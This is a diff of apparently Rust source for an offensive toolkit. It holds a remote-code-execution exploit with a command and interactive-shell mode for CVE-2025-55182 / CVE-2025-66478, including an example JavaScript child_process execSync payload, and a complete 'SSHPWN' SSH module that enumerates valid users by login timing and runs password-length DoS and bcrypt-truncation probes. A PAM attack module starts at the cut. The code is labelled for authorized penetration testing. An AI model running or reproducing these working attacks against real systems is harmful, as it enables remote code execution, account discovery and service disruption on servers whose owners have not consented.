if header_input == "done" || header_input.is_empty() {
|
||||
break;
|
||||
}
|
||||
if let Some(colon_pos) = header_input.find(':') {
|
||||
let key = header_input[..colon_pos].trim().to_string();
|
||||
let value = header_input[colon_pos + 1..].trim().to_string();
|
||||
if !key.is_empty() && !value.is_empty() {
|
||||
config.custom_headers.push((key, value));
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Build HTTP client
|
||||
let mut client_builder = Client::builder()
|
||||
.timeout(Duration::from_secs(config.timeout))
|
||||
.danger_accept_invalid_certs(!config.verify_ssl);
|
||||
|
||||
if let Some(proxy_url) = &config.proxy {
|
||||
let proxy = reqwest::Proxy::all(proxy_url)
|
||||
.context("Failed to create proxy")?;
|
||||
client_builder = client_builder.proxy(proxy);
|
||||
}
|
||||
|
||||
let client = client_builder.build()
|
||||
.context("Failed to build HTTP client")?;
|
||||
|
||||
// Prompt for mode
|
||||
println!();
|
||||
println!("{}", "Select mode:".yellow().bold());
|
||||
println!(" 1. Vulnerability Detection (quick check)");
|
||||
println!(" 2. Execute Single Command");
|
||||
println!(" 3. Interactive Shell");
|
||||
println!(" 4. Custom RCE Payload");
|
||||
println!();
|
||||
|
||||
print!("{}", "Mode [1-4]: ".cyan().bold());
|
||||
io::stdout().flush()?;
|
||||
let mut mode_input = String::new();
|
||||
io::stdin().read_line(&mut mode_input)?;
|
||||
let mode = mode_input.trim();
|
||||
|
||||
match mode {
|
||||
"1" => {
|
||||
println!("{}", "[*] Checking for vulnerability...".cyan());
|
||||
match check_vulnerability(&client, &base_url, &config).await {
|
||||
Ok(true) => {
|
||||
println!("{}", "[+] Target is VULNERABLE!".red().bold());
|
||||
println!("{}", "[+] CVE-2025-55182 / CVE-2025-66478 confirmed".red().bold());
|
||||
}
|
||||
Ok(false) => {
|
||||
println!("{}", "[-] Target does not appear to be vulnerable.".green());
|
||||
}
|
||||
Err(e) => {
|
||||
println!("{}", format!("[-] Error checking vulnerability: {}", e).red());
|
||||
}
|
||||
}
|
||||
}
|
||||
"2" => {
|
||||
println!();
|
||||
println!("{}", "Select RCE payload type:".yellow().bold());
|
||||
println!(" 1. whoami (default)");
|
||||
println!(" 2. id");
|
||||
println!(" 3. pwd");
|
||||
println!(" 4. uname -a");
|
||||
println!(" 5. ls -la");
|
||||
println!(" 6. ps aux");
|
||||
println!(" 7. Custom command");
|
||||
println!();
|
||||
|
||||
let payload_choice = prompt_default("Payload type [1-7]", "1")?;
|
||||
|
||||
let (payload_type, custom_cmd) = match payload_choice.as_str() {
|
||||
"1" => ("whoami", None),
|
||||
"2" => ("id", None),
|
||||
"3" => ("pwd", None),
|
||||
"4" => ("uname", None),
|
||||
"5" => ("ls", None),
|
||||
"6" => ("ps", None),
|
||||
"7" => {
|
||||
let cmd = prompt("Custom command to execute")?;
|
||||
if cmd.is_empty() {
|
||||
return Err(anyhow!("Command cannot be empty"));
|
||||
}
|
||||
("custom_cmd", Some(cmd))
|
||||
}
|
||||
_ => ("whoami", None),
|
||||
};
|
||||
|
||||
println!("{}", format!("[*] Executing payload: {}", payload_type).cyan());
|
||||
match execute_command_with_payload(&client, &base_url, payload_type, custom_cmd.as_deref(), None, &config).await {
|
||||
Ok(result) => {
|
||||
print_results(&result, &config);
|
||||
}
|
||||
Err(e) => {
|
||||
println!("{}", format!("[-] Error executing command: {}", e).red());
|
||||
}
|
||||
}
|
||||
}
|
||||
"3" => {
|
||||
interactive_shell(&client, &base_url, &config).await?;
|
||||
}
|
||||
"4" => {
|
||||
println!();
|
||||
println!("{}", "Custom RCE Payload Mode".yellow().bold());
|
||||
println!("{}", "Enter custom JavaScript code to execute on the target".cyan());
|
||||
println!("{}", "Example: var res=process.mainModule.require('child_process').execSync('id').toString();".dimmed());
|
||||
println!();
|
||||
|
||||
let custom_js = prompt("Custom JavaScript code")?;
|
||||
if custom_js.is_empty() {
|
||||
return Err(anyhow!("JavaScript code cannot be empty"));
|
||||
}
|
||||
|
||||
println!("{}", format!("[*] Executing custom JavaScript payload...").cyan());
|
||||
match execute_command_with_payload(&client, &base_url, "custom_js", None, Some(&custom_js), &config).await {
|
||||
Ok(result) => {
|
||||
print_results(&result, &config);
|
||||
}
|
||||
Err(e) => {
|
||||
println!("{}", format!("[-] Error executing custom payload: {}", e).red());
|
||||
}
|
||||
}
|
||||
}
|
||||
_ => {
|
||||
return Err(anyhow!("Invalid mode selected"));
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[test]
|
||||
fn test_payload_creation() {
|
||||
let payload = create_payload_base64("whoami");
|
||||
assert!(payload.contains("whoami"));
|
||||
assert!(payload.contains("base64"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_decode_base64() {
|
||||
let encoded = "dGVzdAo="; // "test\n" in base64
|
||||
let decoded = decode_base64_output(encoded).unwrap();
|
||||
assert_eq!(decoded, "test\n");
|
||||
}
|
||||
}
|
||||
@@ -1,12 +1,29 @@
|
||||
use anyhow::{Result, Context};
|
||||
use reqwest;
|
||||
use anyhow::{Context, Result};
|
||||
use colored::*;
|
||||
use reqwest::Client;
|
||||
use std::time::Duration;
|
||||
|
||||
const DEFAULT_TIMEOUT_SECS: u64 = 10;
|
||||
|
||||
/// A basic demonstration exploit that checks if a specific endpoint is "vulnerable"
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
println!("[*] Running sample_exploit against target: {}", target);
|
||||
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ Sample Exploit Module - Demonstration ║".cyan());
|
||||
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
|
||||
println!("{}", format!("[*] Target: {}", target).yellow());
|
||||
|
||||
let client = Client::builder()
|
||||
.timeout(Duration::from_secs(DEFAULT_TIMEOUT_SECS))
|
||||
.danger_accept_invalid_certs(true)
|
||||
.build()
|
||||
.context("Failed to build HTTP client")?;
|
||||
|
||||
let url = format!("http://{}/vulnerable_endpoint", target);
|
||||
let resp = reqwest::get(&url)
|
||||
println!("{}", format!("[*] Checking: {}", url).cyan());
|
||||
|
||||
let resp = client
|
||||
.get(&url)
|
||||
.send()
|
||||
.await
|
||||
.context("Failed to send request")?
|
||||
.text()
|
||||
@@ -14,9 +31,9 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
.context("Failed to read response")?;
|
||||
|
||||
if resp.contains("Vulnerable!") {
|
||||
println!("[+] Target is vulnerable!");
|
||||
println!("{}", "[+] Target is vulnerable!".green().bold());
|
||||
} else {
|
||||
println!("[-] Target does not appear to be vulnerable.");
|
||||
println!("{}", "[-] Target does not appear to be vulnerable.".red());
|
||||
}
|
||||
|
||||
Ok(())
|
||||
|
||||
@@ -1 +1,6 @@
|
||||
pub mod opensshserver_9_8p1race_condition;
|
||||
pub mod sshpwn_sftp_attacks;
|
||||
pub mod sshpwn_scp_attacks;
|
||||
pub mod sshpwn_session;
|
||||
pub mod sshpwn_auth_passwd;
|
||||
pub mod sshpwn_pam;
|
||||
|
||||
@@ -0,0 +1,565 @@
|
||||
//! SSHPWN Auth Password Attack Module
|
||||
//!
|
||||
//! Based on OpenSSH 10.0p1 auth2-passwd.c vulnerability analysis
|
||||
//!
|
||||
//! AUTH2-PASSWD VULNERABILITIES (auth2-passwd.c):
|
||||
//! - Password length not explicitly limited - potential DoS via long passwords (LOW)
|
||||
//! - Password change information disclosure - server fingerprinting (INFO)
|
||||
//! - Timing attack via mm_auth_password - user enumeration (MEDIUM)
|
||||
//!
|
||||
//! For authorized penetration testing only.
|
||||
|
||||
use anyhow::{anyhow, Result};
|
||||
use colored::*;
|
||||
use ssh2::Session;
|
||||
use std::{
|
||||
io::Write,
|
||||
net::TcpStream,
|
||||
time::{Duration, Instant},
|
||||
};
|
||||
|
||||
fn display_banner() {
|
||||
println!("{}", "╔═══════════════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ SSHPWN - Auth Password Attack Module ║".cyan());
|
||||
println!("{}", "║ Based on OpenSSH auth2-passwd.c vulnerability analysis ║".cyan());
|
||||
println!("{}", "║ ║".cyan());
|
||||
println!("{}", "║ Attack Modes: ║".cyan());
|
||||
println!("{}", "║ 1. Password Length DoS Test (sshpkt_get_cstring limit) ║".cyan());
|
||||
println!("{}", "║ 2. Password Change Information Leak ║".cyan());
|
||||
println!("{}", "║ 3. Auth Timing Attack (mm_auth_password) ║".cyan());
|
||||
println!("{}", "║ 4. Bcrypt Length Bypass Test (72-byte limit) ║".cyan());
|
||||
println!("{}", "╚═══════════════════════════════════════════════════════════════════╝".cyan());
|
||||
println!();
|
||||
}
|
||||
|
||||
/// Normalize target for connection
|
||||
fn normalize_target(target: &str) -> String {
|
||||
let trimmed = target.trim();
|
||||
if trimmed.starts_with('[') && trimmed.contains(']') {
|
||||
trimmed.to_string()
|
||||
} else if trimmed.contains(':') && !trimmed.contains('.') {
|
||||
format!("[{}]", trimmed)
|
||||
} else {
|
||||
trimmed.to_string()
|
||||
}
|
||||
}
|
||||
|
||||
/// Time a single authentication attempt
|
||||
fn time_auth_attempt(host: &str, port: u16, username: &str, password: &str, timeout_secs: u64) -> Option<(f64, bool, String)> {
|
||||
let addr = format!("{}:{}", host, port);
|
||||
|
||||
let start = Instant::now();
|
||||
|
||||
let tcp = match TcpStream::connect_timeout(
|
||||
&addr.parse().ok()?,
|
||||
Duration::from_secs(timeout_secs),
|
||||
) {
|
||||
Ok(s) => s,
|
||||
Err(e) => return Some((0.0, false, format!("Connect failed: {}", e))),
|
||||
};
|
||||
|
||||
let _ = tcp.set_read_timeout(Some(Duration::from_secs(timeout_secs)));
|
||||
let _ = tcp.set_write_timeout(Some(Duration::from_secs(timeout_secs)));
|
||||
|
||||
let mut sess = match Session::new() {
|
||||
Ok(s) => s,
|
||||
Err(e) => return Some((0.0, false, format!("Session failed: {}", e))),
|
||||
};
|
||||
|
||||
sess.set_tcp_stream(tcp);
|
||||
if let Err(e) = sess.handshake() {
|
||||
return Some((start.elapsed().as_secs_f64(), false, format!("Handshake failed: {}", e)));
|
||||
}
|
||||
|
||||
// Try authentication
|
||||
let auth_result = sess.userauth_password(username, password);
|
||||
let elapsed = start.elapsed().as_secs_f64();
|
||||
|
||||
match auth_result {
|
||||
Ok(_) => Some((elapsed, sess.authenticated(), "OK".to_string())),
|
||||
Err(e) => Some((elapsed, false, format!("{}", e))),
|
||||
}
|
||||
}
|
||||
|
||||
/// Password Length DoS Test
|
||||
///
|
||||
/// Vulnerability: auth2-passwd.c lines 60-66 - sshpkt_get_cstring() has no explicit limit
|
||||
/// Very long passwords could cause DoS in downstream bcrypt (72-byte) or PAM modules
|
||||
pub async fn attack_password_length_dos(
|
||||
host: &str,
|
||||
port: u16,
|
||||
username: &str,
|
||||
max_length: usize,
|
||||
) -> Result<bool> {
|
||||
println!("{}", format!("[*] Password Length DoS Test on {}", host).cyan());
|
||||
println!("{}", "[*] Vulnerability: auth2-passwd.c sshpkt_get_cstring() no explicit limit".cyan());
|
||||
println!("{}", "[*] Testing password lengths that may cause downstream issues".cyan());
|
||||
println!();
|
||||
|
||||
// Test progressively longer passwords
|
||||
let test_lengths = vec![
|
||||
64, // Normal
|
||||
72, // bcrypt limit
|
||||
128, // Double bcrypt
|
||||
256, // Moderate
|
||||
512, // Large
|
||||
1024, // Very large
|
||||
2048, // Huge
|
||||
4096, // Extreme
|
||||
8192, // Maximum test
|
||||
max_length.min(16384),
|
||||
];
|
||||
|
||||
println!("{}", "[*] Testing password lengths:".cyan());
|
||||
println!("{}", "[*] Note: bcrypt has 72-byte limit, longer passwords are truncated".dimmed());
|
||||
println!();
|
||||
|
||||
let mut abnormal_behavior = Vec::new();
|
||||
let mut baseline_time: Option<f64> = None;
|
||||
|
||||
for &len in &test_lengths {
|
||||
if len > max_length {
|
||||
break;
|
||||
}
|
||||
|
||||
// Generate password of specified length
|
||||
let password: String = std::iter::repeat('A').take(len).collect();
|
||||
|
||||
print!(" Testing {} bytes... ", len);
|
||||
let _ = std::io::stdout().flush();
|
||||
|
||||
match time_auth_attempt(host, port, username, &password, 30) {
|
||||
Some((time, _success, msg)) => {
|
||||
// Set baseline from first test
|
||||
if baseline_time.is_none() {
|
||||
baseline_time = Some(time);
|
||||
}
|
||||
|
||||
let base = baseline_time.unwrap_or(time);
|
||||
let ratio = if base > 0.0 { time / base } else { 1.0 };
|
||||
|
||||
if time > 10.0 {
|
||||
println!("{}", format!("SLOW ({:.2}s) - {}", time, msg).yellow());
|
||||
abnormal_behavior.push((len, time, msg));
|
||||
} else if ratio > 2.0 {
|
||||
println!("{}", format!("SLOW ({:.2}s, {:.1}x baseline) - {}", time, ratio, msg).yellow());
|
||||
abnormal_behavior.push((len, time, msg));
|
||||
} else {
|
||||
println!("{}", format!("OK ({:.2}s) - {}", time, msg).green());
|
||||
}
|
||||
}
|
||||
None => {
|
||||
println!("{}", "Connection failed".red());
|
||||
}
|
||||
}
|
||||
|
||||
// Small delay between tests
|
||||
std::thread::sleep(Duration::from_millis(500));
|
||||
}
|
||||
|
||||
println!();
|
||||
println!("{}", "=== Password Length DoS Results ===".cyan().bold());
|
||||
|
||||
if !abnormal_behavior.is_empty() {
|
||||
println!("{}", "[VULN] Abnormal behavior detected with long passwords:".red().bold());
|
||||
for (len, time, msg) in &abnormal_behavior {
|
||||
println!(" {} bytes: {:.2}s - {}", len, time, msg);
|
||||
}
|
||||
println!();
|
||||
println!("{}", "[*] Server may be vulnerable to password length DoS".yellow());
|
||||
println!("{}", "[*] Downstream PAM modules or bcrypt may have issues".cyan());
|
||||
Ok(true)
|
||||
} else {
|
||||
println!("{}", "[*] No significant timing variations detected".green());
|
||||
println!("{}", "[*] Server handles long passwords gracefully".cyan());
|
||||
Ok(false)
|
||||
}
|
||||
}
|
||||
|
||||
/// Password Change Information Leak Test
|
||||
///
|
||||
/// Vulnerability: auth2-passwd.c line 69 - "password change not supported" logged
|
||||
/// This reveals server configuration and confirms authentication reached password handler
|
||||
pub async fn attack_password_change_leak(
|
||||
host: &str,
|
||||
port: u16,
|
||||
) -> Result<bool> {
|
||||
println!("{}", format!("[*] Password Change Information Leak Test on {}:{}", host, port).cyan());
|
||||
println!("{}", "[*] Vulnerability: auth2-passwd.c logs 'password change not supported'".cyan());
|
||||
println!();
|
||||
|
||||
println!("{}", "[*] Testing SSH password change behavior...".cyan());
|
||||
|
||||
// Note: SSH2 password change is signaled by a flag in the packet
|
||||
// We can't easily test this with libssh2, but we can document the vulnerability
|
||||
|
||||
println!();
|
||||
println!("{}", "=== Password Change Information Leak Analysis ===".cyan().bold());
|
||||
println!();
|
||||
println!("{}", "[*] Vulnerability Details:".yellow());
|
||||
println!("{}", " When SSH2_MSG_USERAUTH_REQUEST contains password change flag:".dimmed());
|
||||
println!("{}", " 1. Server logs 'password change not supported' if unsupported".dimmed());
|
||||
println!("{}", " 2. This confirms authentication reached password handler".dimmed());
|
||||
println!("{}", " 3. Reveals server's password change configuration".dimmed());
|
||||
println!();
|
||||
println!("{}", "[*] Attack Vectors:".cyan());
|
||||
println!("{}", " - Server fingerprinting via response timing".dimmed());
|
||||
println!("{}", " - Configuration enumeration".dimmed());
|
||||
println!("{}", " - Confirm valid authentication path reached".dimmed());
|
||||
println!();
|
||||
println!("{}", "[*] To test manually:".yellow());
|
||||
println!("{}", " Use SSH client with password change support".dimmed());
|
||||
println!("{}", " ssh -o KbdInteractiveAuthentication=yes target".dimmed());
|
||||
println!();
|
||||
println!("{}", "[INFO] This is an informational vulnerability".yellow());
|
||||
println!("{}", "[*] Direct exploitation requires custom SSH client".cyan());
|
||||
|
||||
Ok(true)
|
||||
}
|
||||
|
||||
/// Auth Timing Attack - User Enumeration via mm_auth_password timing
|
||||
///
|
||||
/// Vulnerability: auth2-passwd.c line 70 - Timing depends on downstream implementation
|
||||
/// Different timing for valid vs invalid users enables enumeration
|
||||
pub async fn attack_auth_timing(
|
||||
host: &str,
|
||||
port: u16,
|
||||
usernames: &[String],
|
||||
samples: usize,
|
||||
) -> Result<Vec<String>> {
|
||||
println!("{}", format!("[*] Auth Timing Attack on {}", host).cyan());
|
||||
println!("{}", "[*] Vulnerability: auth2-passwd.c mm_auth_password timing".cyan());
|
||||
println!("{}", "[*] Testing timing differences between valid/invalid users".cyan());
|
||||
println!();
|
||||
|
||||
// Get baseline timing with definitely invalid user
|
||||
let baseline_user = format!("nonexistent_{}_{}", std::process::id(), Instant::now().elapsed().as_nanos());
|
||||
|
||||
println!("{}", "[*] Establishing baseline with invalid user...".cyan());
|
||||
|
||||
let mut baseline_times = Vec::new();
|
||||
for i in 0..samples {
|
||||
let password = format!("invalid_{}_{}", std::process::id(), i);
|
||||
if let Some((time, _, _)) = time_auth_attempt(host, port, &baseline_user, &password, 15) {
|
||||
baseline_times.push(time);
|
||||
}
|
||||
std::thread::sleep(Duration::from_millis(200));
|
||||
}
|
||||
|
||||
if baseline_times.is_empty() {
|
||||
println!("{}", "[-] Could not establish baseline".red());
|
||||
return Ok(Vec::new());
|
||||
}
|
||||
|
||||
let baseline = baseline_times.iter().sum::<f64>() / baseline_times.len() as f64;
|
||||
let baseline_stddev = (baseline_times.iter()
|
||||
.map(|t| (t - baseline).powi(2))
|
||||
.sum::<f64>() / baseline_times.len() as f64).sqrt();
|
||||
|
||||
println!("{}", format!("[*] Baseline: {:.3}s ± {:.3}s", baseline, baseline_stddev).cyan());
|
||||
println!();
|
||||
|
||||
// Test empty password timing (potential gap per vulnerability #3)
|
||||
println!("{}", "[*] Testing empty password timing (potential mitigation gap)...".cyan());
|
||||
|
||||
let mut empty_times = Vec::new();
|
||||
for _ in 0..samples {
|
||||
if let Some((time, _, _)) = time_auth_attempt(host, port, &baseline_user, "", 15) {
|
||||
empty_times.push(time);
|
||||
}
|
||||
std::thread::sleep(Duration::from_millis(200));
|
||||
}
|
||||
|
||||
if !empty_times.is_empty() {
|
||||
let empty_avg = empty_times.iter().sum::<f64>() / empty_times.len() as f64;
|
||||
let diff = empty_avg - baseline;
|
||||
|
||||
if diff.abs() > baseline_stddev * 2.0 {
|
||||
println!("{}", format!("[VULN] Empty password timing differs: {:+.3}s", diff).red().bold());
|
||||
println!("{}", "[*] Possible timing attack via empty password".yellow());
|
||||
} else {
|
||||
println!("{}", format!("[*] Empty password: {:.3}s (diff: {:+.3}s)", empty_avg, diff).dimmed());
|
||||
}
|
||||
}
|
||||
|
||||
println!();
|
||||
println!("{}", "[*] Testing usernames...".cyan());
|
||||
|
||||
let mut valid_users = Vec::new();
|
||||
let threshold = baseline_stddev * 3.0 + 0.1; // 3 sigma + 100ms
|
||||
|
||||
for user in usernames {
|
||||
print!("\r[*] Testing: {} ", user);
|
||||
let _ = std::io::stdout().flush();
|
||||
|
||||
let mut times = Vec::new();
|
||||
for i in 0..samples {
|
||||
let password = format!("invalid_test_{}_{}", std::process::id(), i);
|
||||
if let Some((time, _, _)) = time_auth_attempt(host, port, user, &password, 15) {
|
||||
times.push(time);
|
||||
}
|
||||
std::thread::sleep(Duration::from_millis(200));
|
||||
}
|
||||
|
||||
if !times.is_empty() {
|
||||
let avg = times.iter().sum::<f64>() / times.len() as f64;
|
||||
let diff = avg - baseline;
|
||||
|
||||
if diff.abs() > threshold {
|
||||
println!("\r{}", format!("[+] Potential valid user: {} (timing diff: {:+.3}s)", user, diff).green());
|
||||
valid_users.push(user.clone());
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
println!("\r ");
|
||||
println!();
|
||||
println!("{}", "=== Auth Timing Results ===".cyan().bold());
|
||||
|
||||
if valid_users.is_empty() {
|
||||
println!("{}", "[-] No valid users detected via timing".yellow());
|
||||
println!("{}", "[*] Server may have proper timing mitigation (fakepw/fake_password)".cyan());
|
||||
} else {
|
||||
println!("{}", format!("[+] Potentially valid users ({}):", valid_users.len()).green());
|
||||
for user in &valid_users {
|
||||
println!(" - {}", user.green());
|
||||
}
|
||||
}
|
||||
|
||||
Ok(valid_users)
|
||||
}
|
||||
|
||||
/// Bcrypt 72-byte Limit Bypass Test
|
||||
///
|
||||
/// Vulnerability: bcrypt only uses first 72 bytes of password
|
||||
/// Passwords longer than 72 bytes are effectively truncated
|
||||
pub async fn attack_bcrypt_truncation(
|
||||
host: &str,
|
||||
port: u16,
|
||||
username: &str,
|
||||
base_password: &str,
|
||||
) -> Result<bool> {
|
||||
println!("{}", format!("[*] Bcrypt 72-byte Truncation Test on {}", host).cyan());
|
||||
println!("{}", "[*] Testing if server uses bcrypt with 72-byte password limit".cyan());
|
||||
println!();
|
||||
|
||||
// bcrypt only uses first 72 bytes
|
||||
let truncation_point = 72;
|
||||
|
||||
// If base password is shorter than 72, pad it
|
||||
let test_base: String = if base_password.len() < truncation_point {
|
||||
format!("{}{}", base_password, "A".repeat(truncation_point - base_password.len()))
|
||||
} else {
|
||||
base_password.chars().take(truncation_point).collect()
|
||||
};
|
||||
|
||||
// Create variants that differ only after 72 bytes
|
||||
let password_72 = test_base.clone();
|
||||
let password_73 = format!("{}X", test_base);
|
||||
let password_100 = format!("{}{}", test_base, "X".repeat(28));
|
||||
|
||||
println!("{}", format!("[*] Testing password variants (first 72 chars: '{}'...)", &test_base[..20.min(test_base.len())]).cyan());
|
||||
println!("{}", format!(" Password A: {} bytes (baseline)", password_72.len()).dimmed());
|
||||
println!("{}", format!(" Password B: {} bytes (differs at byte 73)", password_73.len()).dimmed());
|
||||
println!("{}", format!(" Password C: {} bytes (differs at bytes 73-100)", password_100.len()).dimmed());
|
||||
println!();
|
||||
|
||||
// Test each password
|
||||
let passwords = vec![
|
||||
("72-byte", &password_72),
|
||||
("73-byte", &password_73),
|
||||
("100-byte", &password_100),
|
||||
];
|
||||
|
||||
let mut results = Vec::new();
|
||||
|
||||
for (name, password) in &passwords {
|
||||
print!("[*] Testing {} password... ", name);
|
||||
let _ = std::io::stdout().flush();
|
||||
|
||||
match time_auth_attempt(host, port, username, password, 15) {
|
||||
Some((time, success, msg)) => {
|
||||
results.push((name.to_string(), time, success, msg.clone()));
|
||||
if success {
|
||||
println!("{}", "SUCCESS".green().bold());
|
||||
} else {
|
||||
println!("{}", format!("{:.2}s - {}", time, msg).dimmed());
|
||||
}
|
||||
}
|
||||
None => {
|
||||
println!("{}", "Connection failed".red());
|
||||
}
|
||||
}
|
||||
|
||||
std::thread::sleep(Duration::from_millis(500));
|
||||
}
|
||||
|
||||
println!();
|
||||
println!("{}", "=== Bcrypt Truncation Analysis ===".cyan().bold());
|
||||
|
||||
// Check if timing is consistent (would indicate truncation)
|
||||
if results.len() >= 2 {
|
||||
let time_72 = results.get(0).map(|r| r.1).unwrap_or(0.0);
|
||||
let time_73 = results.get(1).map(|r| r.1).unwrap_or(0.0);
|
||||
let time_100 = results.get(2).map(|r| r.1).unwrap_or(0.0);
|
||||
|
||||
let diff_73 = (time_73 - time_72).abs();
|
||||
let diff_100 = (time_100 - time_72).abs();
|
||||
|
||||
if diff_73 < 0.1 && diff_100 < 0.1 {
|
||||
println!("{}", "[*] Timing consistent across all lengths".yellow());
|
||||
println!("{}", "[*] Server may be using bcrypt (72-byte truncation)".cyan());
|
||||
println!();
|
||||
println!("{}", "[!] Implication: Passwords >72 bytes provide no extra security".yellow().bold());
|
||||
println!("{}", "[*] Password 'AAAA...AAA' (72) == 'AAAA...AAAXXX' (75)".dimmed());
|
||||
return Ok(true);
|
||||
}
|
||||
}
|
||||
|
||||
println!("{}", "[*] Timing varies - server may not use bcrypt or has different handling".cyan());
|
||||
println!("{}", "[*] Cannot confirm 72-byte truncation".dimmed());
|
||||
|
||||
Ok(false)
|
||||
}
|
||||
|
||||
/// Prompt helpers
|
||||
fn prompt_default(message: &str, default: &str) -> Result<String> {
|
||||
print!("{} [{}]: ", message, default);
|
||||
std::io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
std::io::stdin().read_line(&mut input)?;
|
||||
let trimmed = input.trim();
|
||||
if trimmed.is_empty() {
|
||||
Ok(default.to_string())
|
||||
} else {
|
||||
Ok(trimmed.to_string())
|
||||
}
|
||||
}
|
||||
|
||||
fn prompt_optional(message: &str) -> Result<Option<String>> {
|
||||
print!("{} (leave empty to skip): ", message);
|
||||
std::io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
std::io::stdin().read_line(&mut input)?;
|
||||
let trimmed = input.trim();
|
||||
if trimmed.is_empty() {
|
||||
Ok(None)
|
||||
} else {
|
||||
Ok(Some(trimmed.to_string()))
|
||||
}
|
||||
}
|
||||
|
||||
fn prompt_yes_no(message: &str, default: bool) -> Result<bool> {
|
||||
let hint = if default { "Y/n" } else { "y/N" };
|
||||
print!("{} [{}]: ", message, hint);
|
||||
std::io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
std::io::stdin().read_line(&mut input)?;
|
||||
let trimmed = input.trim().to_lowercase();
|
||||
match trimmed.as_str() {
|
||||
"" => Ok(default),
|
||||
"y" | "yes" => Ok(true),
|
||||
"n" | "no" => Ok(false),
|
||||
_ => Ok(default),
|
||||
}
|
||||
}
|
||||
|
||||
/// Default usernames for timing attack
|
||||
const DEFAULT_USERNAMES: &[&str] = &[
|
||||
"root", "admin", "user", "test", "guest",
|
||||
"ubuntu", "www-data", "daemon", "nobody",
|
||||
"mysql", "postgres", "oracle", "ftp", "ssh",
|
||||
];
|
||||
|
||||
/// Main entry point
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
display_banner();
|
||||
|
||||
let host = normalize_target(target);
|
||||
println!("{}", format!("[*] Target: {}", host).cyan());
|
||||
|
||||
// Get port
|
||||
let port: u16 = prompt_default("SSH Port", "22")?.parse().unwrap_or(22);
|
||||
|
||||
println!();
|
||||
println!("{}", "Select attack mode:".yellow().bold());
|
||||
println!(" 1. Password Length DoS Test");
|
||||
println!(" 2. Password Change Information Leak (Analysis)");
|
||||
println!(" 3. Auth Timing Attack (User Enumeration)");
|
||||
println!(" 4. Bcrypt 72-byte Truncation Test");
|
||||
println!(" 5. Run All Attacks");
|
||||
println!();
|
||||
|
||||
let mode = prompt_default("Attack mode", "3")?;
|
||||
|
||||
match mode.as_str() {
|
||||
"1" => {
|
||||
let username = prompt_default("Username to test", "root")?;
|
||||
let max_len: usize = prompt_default("Maximum password length", "8192")?.parse().unwrap_or(8192);
|
||||
attack_password_length_dos(&host, port, &username, max_len).await?;
|
||||
}
|
||||
"2" => {
|
||||
attack_password_change_leak(&host, port).await?;
|
||||
}
|
||||
"3" => {
|
||||
let samples: usize = prompt_default("Samples per username", "3")?.parse().unwrap_or(3);
|
||||
|
||||
// Get usernames
|
||||
let mut usernames: Vec<String> = Vec::new();
|
||||
|
||||
if prompt_yes_no("Use default username list?", true)? {
|
||||
for user in DEFAULT_USERNAMES {
|
||||
usernames.push(user.to_string());
|
||||
}
|
||||
}
|
||||
|
||||
let custom = prompt_optional("Additional usernames (comma-separated)")?;
|
||||
if let Some(custom_users) = custom {
|
||||
for user in custom_users.split(',') {
|
||||
let user = user.trim();
|
||||
if !user.is_empty() && !usernames.contains(&user.to_string()) {
|
||||
usernames.push(user.to_string());
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if usernames.is_empty() {
|
||||
return Err(anyhow!("No usernames to test"));
|
||||
}
|
||||
|
||||
attack_auth_timing(&host, port, &usernames, samples).await?;
|
||||
}
|
||||
"4" => {
|
||||
let username = prompt_default("Username", "root")?;
|
||||
let base_password = prompt_default("Base password (will be padded to 72 chars)", "testpassword")?;
|
||||
attack_bcrypt_truncation(&host, port, &username, &base_password).await?;
|
||||
}
|
||||
"5" | _ => {
|
||||
println!();
|
||||
println!("{}", "=== Running All Auth Password Attacks ===".yellow().bold());
|
||||
|
||||
println!();
|
||||
println!("{}", "--- Attack 1: Password Length DoS ---".cyan());
|
||||
let _ = attack_password_length_dos(&host, port, "root", 4096).await;
|
||||
|
||||
println!();
|
||||
println!("{}", "--- Attack 2: Password Change Info Leak ---".cyan());
|
||||
let _ = attack_password_change_leak(&host, port).await;
|
||||
|
||||
println!();
|
||||
println!("{}", "--- Attack 3: Auth Timing Attack ---".cyan());
|
||||
let usernames: Vec<String> = DEFAULT_USERNAMES.iter().map(|s| s.to_string()).collect();
|
||||
let _ = attack_auth_timing(&host, port, &usernames, 2).await;
|
||||
|
||||
println!();
|
||||
println!("{}", "--- Attack 4: Bcrypt Truncation ---".cyan());
|
||||
let _ = attack_bcrypt_truncation(&host, port, "root", "testpassword").await;
|
||||
}
|
||||
}
|
||||
|
||||
println!();
|
||||
println!("{}", "[*] Auth password attack module complete".green());
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
@@ -0,0 +1,621 @@
|
||||
//! SSHPWN PAM Attack Module
|
||||
//!
|
||||
//! Based on OpenSSH 10.0p1 auth-pam.c vulnerability analysis
|
||||
//!
|
||||
//! PAM VULNERABILITIES (auth-pam.c):
|
||||
//! - sshpam_password static storage - Password recovery via memory forensics (LOW)
|
||||
//! - pam_putenv() memory leak - DoS via memory exhaustion (LOW)
|
||||
//! - import_environments() - Environment variable injection (MEDIUM)
|
||||
//! - Missing username length validation on non-Solaris (LOW-MEDIUM)
|
||||
//! - setreuid() race condition - Privilege state issues (LOW)
|
||||
//! - Timing attack mitigation gap - Incomplete coverage (LOW)
|
||||
//!
|
||||
//! For authorized penetration testing only.
|
||||
|
||||
use anyhow::{anyhow, Context, Result};
|
||||
use colored::*;
|
||||
use ssh2::Session;
|
||||
use std::{
|
||||
io::{Read, Write},
|
||||
net::TcpStream,
|
||||
path::Path,
|
||||
time::{Duration, Instant},
|
||||
};
|
||||
|
||||
const DEFAULT_TIMEOUT_SECS: u64 = 30;
|
||||
|
||||
fn display_banner() {
|
||||
